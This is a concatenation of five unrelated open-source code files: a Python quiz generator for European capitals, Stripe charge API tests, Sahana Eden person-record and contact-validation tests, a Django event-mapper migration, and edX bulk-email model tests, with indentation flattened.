operep/PythonAutoLearn | complexPrograms/euCapitalsQuizGenerator.py | 1 | 2717 | #! python2
#Program which will use dictionary and generate random quiz files with
#questions and answers in random order along with answer key
import random, os
#The quiz data.
dictionary={'United Kingdom' : 'London', 'Albania' : 'Tirana',
'Andorra' : 'Andorra la Vella', 'Austria' : 'Vienna',
'Belgium' : 'Brussels', 'Bosnia and Herzegovina' : 'Sarajevo',
'Bulgaria' : 'Sofia', 'Croatia' : 'Zagreb', 'Cyprus' : 'Nicosia',
'Czech Republic' : 'Prague', 'Denmark' : 'Copenhagen',
'Estonia' : 'Tallin', 'Finland' : 'Helsinki', 'France' : 'Paris',
'Germany' : 'Berlin', 'Greece' : 'Athens', 'Hungary' : 'Budapest',
'Iceland' : 'Reykjavik', 'Ireland' : 'Dublin', 'Italy' : 'Rome',
'Kosovo' : 'Pristina', 'Latvia' : 'Riga', 'Liechtenstein' : 'Vaduz',
'Lithuania' : 'Vilnius', 'Luxembourg' : 'Luxembourg',
'Macedonia' : 'Skopje', 'Malta' : 'Valetta', 'Moldova' : 'Chisinau',
'Monaco' : 'Monaco', 'Montenegro' : 'Podgorica', 'Norway' : 'Oslo',
'Netherlands' : 'Amsterdam', 'Poland' : 'Warsaw', 'Portugal' : 'Lisbon',
'Romania' : 'Bucharest', 'San Marino' : 'San Marino',
'Serbia' : 'Belgrade', 'Slovakia' : 'Bratislava', 'Slovenia' : 'ljubljana',
'Spain' : 'Madrid', 'Sweden' : 'Stockholm', 'Switzerland' : 'Bern',
'Vatican City' : 'Vatican City'}
os.makedirs('EU_Quiz_Questions')
os.makedirs('EU_Quiz_Answers')
#Generate quiz files
for quizNumber in range(43):
quizFile = open('EU_Quiz_Questions/eucapitals%s.txt' % (quizNumber + 1), 'w')
answerKey = open('EU_Quiz_Answers/eucapitals_answers%s.txt' % (quizNumber + 1), 'w')
quizFile.write('Name:\n\nDate:\n\n')
quizFile.write((' ' * 20) + 'EU Capitals Quiz %s' % (quizNumber + 1))
quizFile.write('\n\n')
countries = list(dictionary.keys())
random.shuffle(countries)
for questionNumber in range(len(dictionary.keys())):
correctAnswer = dictionary[countries[questionNumber]]
wrongAnswers = list(dictionary.values())
del wrongAnswers[wrongAnswers.index(correctAnswer)]
wrongAnswers = random.sample(wrongAnswers, 3)
answerOptions = wrongAnswers + [correctAnswer]
random.shuffle(answerOptions)
quizFile.write('%s. What is the capital of %s?\n' % (questionNumber + 1,
countries[questionNumber]))
for i in range(4):
quizFile.write(' %s. %s\n' % ('ABCD'[i], answerOptions[i]))
quizFile.write('\n')
answerKey.write('%s. %s\n' % (questionNumber + 1, 'ABCD'[
answerOptions.index(correctAnswer)]))
quizFile.close()
answerKey.close()
| gpl-3.0 | 4,456,716,308,613,281,300 | 45.050847 | 88 | 0.598454 | false |
lextoumbourou/txstripe | stripe/test/resources/test_charges.py | 4 | 3120 | import stripe
from stripe.test.helper import (
StripeResourceTest, NOW, DUMMY_CHARGE
)
class ChargeTest(StripeResourceTest):
def test_charge_list(self):
stripe.Charge.list(created={'lt': NOW})
self.requestor_mock.request.assert_called_with(
'get',
'/v1/charges',
{
'created': {'lt': NOW},
}
)
def test_charge_create(self):
stripe.Charge.create(idempotency_key='foo', **DUMMY_CHARGE)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges',
DUMMY_CHARGE,
{'Idempotency-Key': 'foo'},
)
def test_charge_retrieve(self):
stripe.Charge.retrieve('ch_test_id')
self.requestor_mock.request.assert_called_with(
'get',
'/v1/charges/ch_test_id',
{},
None
)
def test_charge_modify(self):
stripe.Charge.modify('ch_test_id', refund=True)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_test_id',
{
'refund': True,
},
None
)
def test_charge_update_dispute(self):
charge = stripe.Charge(id='ch_update_id')
charge.update_dispute(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id/dispute',
{},
{'Idempotency-Key': 'foo'},
)
def test_charge_close_dispute(self):
charge = stripe.Charge(id='ch_update_id')
charge.close_dispute(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id/dispute/close',
{},
{'Idempotency-Key': 'foo'},
)
def test_mark_as_fraudulent(self):
charge = stripe.Charge(id='ch_update_id')
charge.mark_as_fraudulent(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id',
{
'fraud_details': {'user_report': 'fraudulent'}
},
{'Idempotency-Key': 'foo'},
)
def test_mark_as_safe(self):
charge = stripe.Charge(id='ch_update_id')
charge.mark_as_safe(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id',
{
'fraud_details': {'user_report': 'safe'}
},
{'Idempotency-Key': 'foo'},
)
def test_create_with_source_param(self):
stripe.Charge.create(amount=100, currency='usd',
source='btcrcv_test_receiver')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges',
{
'amount': 100,
'currency': 'usd',
'source': 'btcrcv_test_receiver'
},
None,
)
| mit | 6,645,618,441,985,686,000 | 26.610619 | 67 | 0.50609 | false |
flavour/RedHat | modules/unit_tests/s3db/pr.py | 7 | 23399 | # -*- coding: utf-8 -*-
#
# PR Unit Tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3db/pr.py
#
import unittest
import datetime
from gluon import *
from gluon.storage import Storage
from lxml import etree
# =============================================================================
class PRTests(unittest.TestCase):
""" PR Tests """
# -------------------------------------------------------------------------
def setUp(self):
""" Set up organisation records """
auth = current.auth
s3db = current.s3db
auth.override = True
otable = s3db.org_organisation
org1 = Storage(name="Test PR Organisation 1",
acronym="TPO",
country="UK",
website="http://tpo.example.org")
org1_id = otable.insert(**org1)
org1.update(id=org1_id)
s3db.update_super(otable, org1)
org2 = Storage(name="Test PR Organisation 2",
acronym="PTO",
country="US",
website="http://pto.example.com")
org2_id = otable.insert(**org2)
org2.update(id=org2_id)
s3db.update_super(otable, org2)
self.org1 = s3db.pr_get_pe_id("org_organisation", org1_id)
self.org2 = s3db.pr_get_pe_id("org_organisation", org2_id)
# -------------------------------------------------------------------------
def testGetRealmUsers(self):
auth = current.auth
s3db = current.s3db
auth.s3_impersonate("[email protected]")
admin_id = auth.user.id
admin_pe_id = auth.s3_user_pe_id(admin_id)
auth.s3_impersonate("[email protected]")
user_id = auth.user.id
user_pe_id = auth.s3_user_pe_id(user_id)
auth.s3_impersonate(None)
org1 = self.org1
org2 = self.org2
users = s3db.pr_realm_users(org1)
self.assertEqual(users, Storage())
users = s3db.pr_realm_users(org2)
self.assertEqual(users, Storage())
s3db.pr_add_affiliation(org1, admin_pe_id, role="Volunteer", role_type=9)
s3db.pr_add_affiliation(org2, user_pe_id, role="Staff")
users = s3db.pr_realm_users(org1)
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org2)
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2])
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org1, roles="Volunteer")
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users(org2, roles="Volunteer")
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles="Volunteer")
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users(org1, roles="Staff")
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org2, roles="Staff")
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles="Staff")
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles=["Staff", "Volunteer"])
self.assertTrue(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=1)
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=9)
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=None)
self.assertTrue(user_id in users)
self.assertTrue(admin_id in users)
s3db.pr_remove_affiliation(org2, user_pe_id, role="Staff")
users = s3db.pr_realm_users([org1, org2], role_types=None)
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
# None as realm should give a list of all current users
table = auth.settings.table_user
query = (table.deleted != True)
rows = current.db(query).select(table.id)
all_users = [row.id for row in rows]
users = s3db.pr_realm_users(None)
self.assertTrue(all([u in users for u in all_users]))
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
current.auth.override = False
# =============================================================================
class PersonDeduplicateTests(unittest.TestCase):
""" PR Tests """
# -------------------------------------------------------------------------
def setUp(self):
s3db = current.s3db
ptable = s3db.pr_person
ctable = s3db.pr_contact
# Make sure the first record is the older record
created_on = current.request.utcnow - datetime.timedelta(hours=1)
person1 = Storage(first_name = "Test",
last_name = "UserDEDUP",
initials = "TU",
date_of_birth = datetime.date(1974, 4, 13),
created_on = created_on)
person1_id = ptable.insert(**person1)
person1.update(id=person1_id)
s3db.update_super(ptable, person1)
self.person1_id = person1_id
self.pe1_id = s3db.pr_get_pe_id(ptable, person1_id)
person2 = Storage(first_name = "Test",
last_name = "UserDEDUP",
initials = "OU",
date_of_birth = datetime.date(1974, 4, 23))
person2_id = ptable.insert(**person2)
person2.update(id=person2_id)
s3db.update_super(ptable, person2)
self.person2_id = person2_id
self.pe2_id = s3db.pr_get_pe_id(ptable, person2_id)
# -------------------------------------------------------------------------
def testHook(self):
s3db = current.s3db
deduplicate = s3db.get_config("pr_person", "deduplicate")
self.assertNotEqual(deduplicate, None)
self.assertTrue(callable(deduplicate))
# -------------------------------------------------------------------------
def testMatchNames(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Test Match:
# Same first name and last name, no email in either record
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch:
# Different first name, same last name
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def testMatchEmail(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Test without contact records in the DB
# Test Match:
# Same first and last name,
# no email in the DB but in the import item
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch
# Different first name, same last name,
# no email in the DB but in the import item
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test with contact records in the DB
# Test Match - same names, same email
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - same names, no email in import item
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Test Match - same names, no email in import item, but matching DOB
person = Storage(first_name = "Test",
last_name = "UserDEDUP",
date_of_birth = datetime.date(1974, 4, 13))
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - same names, different email
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Test Match - same names, different email, but matching DOB
person = Storage(first_name = "Test",
last_name = "UserDEDUP",
date_of_birth = datetime.date(1974, 4, 13))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, same email, but other record
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch - First names different
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def testMatchInitials(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test Match - same initials
person = Storage(initials="TU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, different initials
person = Storage(first_name="Test",
last_name="UserDEDUP",
initials="OU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same names, different initials, and email
person = Storage(first_name="Test",
last_name="UserDEDUP",
initials="OU")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same initials
person = Storage(initials="OU")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person2_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Match - same initials, same email
person = Storage(initials="TU")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# -------------------------------------------------------------------------
def testMatchDOB(self):
s3db = current.s3db
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test Match - same initials, different email, same DOB
person = Storage(initials="TU",
date_of_birth=datetime.date(1974, 4, 13))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
# Test MisMatch - same initials, different email, different DOB
person = Storage(initials="TU",
date_of_birth=datetime.date(1975, 6, 17))
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def import_item(self, person, email=None, sms=None):
""" Construct a fake import item """
from s3.s3import import S3ImportItem
def item(tablename, data):
return Storage(id = None,
method = None,
tablename = tablename,
data = data,
components = [],
METHOD = S3ImportItem.METHOD)
import_item = item("pr_person", person)
if email:
import_item.components.append(item("pr_contact",
Storage(contact_method = "EMAIL",
value = email)))
if sms:
import_item.components.append(item("pr_contact",
Storage(contact_method = "SMS",
value = sms)))
return import_item
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
self.pe_id = None
self.person_id = None
# =============================================================================
class ContactValidationTests(unittest.TestCase):
""" Test validation of mobile phone numbers in pr_contact_onvalidation """
# -------------------------------------------------------------------------
def setUp(self):
current.auth.override = True
self.current_setting = current.deployment_settings \
.get_msg_require_international_phone_numbers()
# -------------------------------------------------------------------------
def tearDown(self):
settings = current.deployment_settings
current.deployment_settings \
.msg.require_international_phone_numbers = self.current_setting
current.db.rollback()
current.auth.override = False
# -------------------------------------------------------------------------
def testMobilePhoneNumberValidationStandard(self):
""" Test that validator for mobile phone number is applied """
current.deployment_settings \
.msg.require_international_phone_numbers = False
from s3db.pr import S3ContactModel
onvalidation = S3ContactModel.pr_contact_onvalidation
form = Storage(
vars = Storage(
contact_method = "SMS",
)
)
# valid
form.errors = Storage()
form.vars.value = "0368172634"
onvalidation(form)
self.assertEqual(form.vars.value, "0368172634")
self.assertFalse("value" in form.errors)
# invalid
form.errors = Storage()
form.vars.value = "036-ASBKD"
onvalidation(form)
self.assertEqual(form.vars.value, "036-ASBKD")
self.assertTrue("value" in form.errors)
# -------------------------------------------------------------------------
def testMobilePhoneNumberValidationInternational(self):
""" Test that validator for mobile phone number is applied """
current.deployment_settings \
.msg.require_international_phone_numbers = True
from s3db.pr import S3ContactModel
onvalidation = S3ContactModel.pr_contact_onvalidation
form = Storage(
vars = Storage(
contact_method = "SMS",
)
)
# valid
form.errors = Storage()
form.vars.value = "+46-73-3847589"
onvalidation(form)
self.assertEqual(form.vars.value, "+46733847589")
self.assertFalse("value" in form.errors)
# invalid
form.errors = Storage()
form.vars.value = "0368172634"
onvalidation(form)
self.assertEqual(form.vars.value, "0368172634")
self.assertTrue("value" in form.errors)
# -------------------------------------------------------------------------
def testMobilePhoneNumberImportValidationStandard(self):
""" Test that validator for mobile phone number is applied during import """
s3db = current.s3db
current.deployment_settings \
.msg.require_international_phone_numbers = False
xmlstr = """
<s3xml>
<resource name="pr_person" uuid="CONTACTVALIDATORTESTPERSON1">
<data field="first_name">ContactValidatorTestPerson1</data>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT1">
<data field="contact_method">SMS</data>
<data field="value">0368172634</data>
</resource>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT2">
<data field="contact_method">SMS</data>
<data field="value">036-ASBKD</data>
</resource>
</resource>
</s3xml>"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
resource = s3db.resource("pr_person")
result = resource.import_xml(xmltree, ignore_errors=True)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT1")
self.assertEqual(resource.count(), 1)
row = resource.select(["value"], as_rows=True).first()
self.assertNotEqual(row, None)
self.assertEqual(row.value, "0368172634")
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT2")
self.assertEqual(resource.count(), 0)
row = resource.select(["value"], as_rows=True).first()
self.assertEqual(row, None)
# -------------------------------------------------------------------------
def testMobilePhoneNumberImportValidationInternational(self):
""" Test that validator for mobile phone number is applied during import """
s3db = current.s3db
current.deployment_settings \
.msg.require_international_phone_numbers = True
xmlstr = """
<s3xml>
<resource name="pr_person" uuid="CONTACTVALIDATORTESTPERSON2">
<data field="first_name">ContactValidatorTestPerson2</data>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT1">
<data field="contact_method">SMS</data>
<data field="value">0368172634</data>
</resource>
<resource name="pr_contact" uuid="VALIDATORTESTCONTACT2">
<data field="contact_method">SMS</data>
<data field="value">+46-73-3847589</data>
</resource>
</resource>
</s3xml>"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
resource = s3db.resource("pr_person")
result = resource.import_xml(xmltree, ignore_errors=True)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT1")
self.assertEqual(resource.count(), 0)
row = resource.select(["value"], as_rows=True).first()
self.assertEqual(row, None)
resource = s3db.resource("pr_contact", uid="VALIDATORTESTCONTACT2")
self.assertEqual(resource.count(), 1)
row = resource.select(["value"], as_rows=True).first()
self.assertNotEqual(row, None)
self.assertEqual(row.value, "+46733847589")
# =============================================================================
def run_suite(*test_classes):
""" Run the test suite """
loader = unittest.TestLoader()
suite = unittest.TestSuite()
for test_class in test_classes:
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
if suite is not None:
unittest.TextTestRunner(verbosity=2).run(suite)
return
if __name__ == "__main__":
run_suite(
PRTests,
PersonDeduplicateTests,
ContactValidationTests,
)
# END ========================================================================
| mit | 5,767,524,883,297,620,000 | 36.558587 | 84 | 0.546348 | false |
cchristelis/watchkeeper | django_project/event_mapper/migrations/0001_initial.py | 5 | 7921 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import django.contrib.gis.db.models.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('email', models.EmailField(help_text=b'Your email. It will be used as your username also.', unique=True, max_length=75, verbose_name=b'Email')),
('first_name', models.CharField(help_text=b'Your first name.', max_length=100, verbose_name=b'First Name')),
('last_name', models.CharField(help_text=b'Your first name.', max_length=100, verbose_name=b'Last Name')),
('phone_number', models.CharField(help_text=b'It will be used for sending a notification if you want.', max_length=25, verbose_name=b'Your phone number.', blank=True)),
('notified', models.BooleanField(default=False, help_text=b'Set True to get sms notification.', verbose_name=b'Notification status.')),
('is_active', models.BooleanField(default=True, help_text=b'Whether this user is still active or not (a user could be banned or deleted).', verbose_name=b'Active Status')),
('is_admin', models.BooleanField(default=False, help_text=b'Whether this user is admin or not.', verbose_name=b'Admin Status')),
('area_of_interest', django.contrib.gis.db.models.fields.PolygonField(default=None, srid=4326, blank=True, help_text=b'Area of interest of the user.', null=True, verbose_name=b'Area of Interest')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(help_text=b'The name of the country.', max_length=50, verbose_name=b'Country\\s name')),
('polygon_geometry', django.contrib.gis.db.models.fields.PolygonField(srid=4326)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('category', models.IntegerField(help_text=b'There are two event categories: Incident and Advisory', verbose_name=b'Category of the event.', choices=[(1, b'Incident'), (2, b'Advisory')])),
('location', django.contrib.gis.db.models.fields.PointField(help_text=b'The location of the event in point geometry', srid=4326, verbose_name=b'Location')),
('place_name', models.CharField(help_text=b'The name of the event location.', max_length=100, verbose_name=b'Place Name')),
('date_time', models.DateTimeField(help_text=b'Date and time when the event happened.', verbose_name=b'Date and Time (UTC)')),
('killed', models.IntegerField(default=0, help_text=b'The number of killed people of the incident.', verbose_name=b'Killed People')),
('injured', models.IntegerField(default=0, help_text=b'The number of injured people of the incident.', verbose_name=b'Injured People')),
('detained', models.IntegerField(default=0, help_text=b'The number of detained people of the incident.', verbose_name=b'Detained People')),
('source', models.TextField(help_text=b'The source where the event comes from.', verbose_name=b'Source', blank=True)),
('notes', models.TextField(help_text=b'Additional notes for the event.', null=True, verbose_name=b'Notes', blank=True)),
('notified_immediately', models.BooleanField(default=False, help_text=b'If True, there will be immediate notification.', verbose_name=b'Notified Immediately')),
('notification_sent', models.BooleanField(default=False, help_text=b'If True, a notification has been sent for this event.', verbose_name=b'Notification Sent')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EventType',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the event type.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the event type.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the event type.', upload_to=b'event_type_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Perpetrator',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the perpetrator.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the perpetrator.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the perpetrator.', upload_to=b'perpetrator_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Victim',
fields=[
('slug', models.SlugField(unique=True, serialize=False, primary_key=True)),
('name', models.CharField(help_text=b'A name for the victim.', unique=True, max_length=100)),
('description', models.TextField(help_text=b'Description for the victim.', blank=True)),
('icon', models.ImageField(help_text=b'The icon for the victim.', upload_to=b'victim_icon', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='event',
name='perpetrator',
field=models.ForeignKey(verbose_name=b'Perpetrator', to='event_mapper.Perpetrator', help_text=b'The perpetrator of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='reported_by',
field=models.ForeignKey(verbose_name=b'Event Reporter', to=settings.AUTH_USER_MODEL, help_text=b'The user who reports the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='type',
field=models.ForeignKey(verbose_name=b'Event Type', to='event_mapper.EventType', help_text=b'The type of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='event',
name='victim',
field=models.ForeignKey(verbose_name=b'Victim', to='event_mapper.Victim', help_text=b'The victim of the event.'),
preserve_default=True,
),
migrations.AddField(
model_name='user',
name='countries_notified',
field=models.ManyToManyField(help_text=b'The countries that user wants to be notified.', to='event_mapper.Country', verbose_name=b'Notified countries'),
preserve_default=True,
),
]
| bsd-2-clause | 2,204,084,221,235,948,000 | 59.007576 | 213 | 0.604722 | false |
cyanna/edx-platform | lms/djangoapps/bulk_email/tests/test_models.py | 14 | 7465 | """
Unit tests for bulk-email-related models.
"""
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from student.tests.factories import UserFactory
from mock import patch, Mock
from bulk_email.models import CourseEmail, SEND_TO_STAFF, CourseEmailTemplate, CourseAuthorization
from opaque_keys.edx.locations import SlashSeparatedCourseKey
@patch('bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message'))
class CourseEmailTest(TestCase):
"""Test the CourseEmail model."""
def test_creation(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
def test_creation_with_optional_attributes(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
template_name = "branded_template"
from_addr = "[email protected]"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message, template_name=template_name, from_addr=from_addr)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
self.assertEquals(email.template_name, template_name)
self.assertEquals(email.from_addr, from_addr)
def test_bad_to_option(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = "fake"
subject = "dummy subject"
html_message = "<html>dummy message</html>"
with self.assertRaises(ValueError):
CourseEmail.create(course_id, sender, to_option, subject, html_message)
class NoCourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model without loading the template data."""
def test_get_missing_template(self):
with self.assertRaises(CourseEmailTemplate.DoesNotExist):
CourseEmailTemplate.get_template()
class CourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model."""
def setUp(self):
super(CourseEmailTemplateTest, self).setUp()
# load initial content (since we don't run migrations as part of tests):
call_command("loaddata", "course_email_template.json")
def _get_sample_plain_context(self):
"""Provide sample context sufficient for rendering plaintext template"""
context = {
'course_title': "Bogus Course Title",
'course_url': "/location/of/course/url",
'account_settings_url': "/location/of/account/settings/url",
'platform_name': 'edX',
'email': '[email protected]',
}
return context
def _get_sample_html_context(self):
"""Provide sample context sufficient for rendering HTML template"""
context = self._get_sample_plain_context()
context['course_image_url'] = "/location/of/course/image/url"
return context
def test_get_template(self):
# Get the default template, which has name=None
template = CourseEmailTemplate.get_template()
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
def test_get_branded_template(self):
# Get a branded (non default) template and make sure we get what we expect
template = CourseEmailTemplate.get_template(name="branded.template")
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
self.assertIn(u"THIS IS A BRANDED HTML TEMPLATE", template.html_template)
self.assertIn(u"THIS IS A BRANDED TEXT TEMPLATE", template.plain_template)
def test_render_html_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_html_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_htmltext("My new html text.", context)
def test_render_plaintext_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_plain_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_plaintext("My new plain text.", context)
def test_render_html(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_html_context()
template.render_htmltext("My new html text.", context)
def test_render_plain(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_plain_context()
template.render_plaintext("My new plain text.", context)
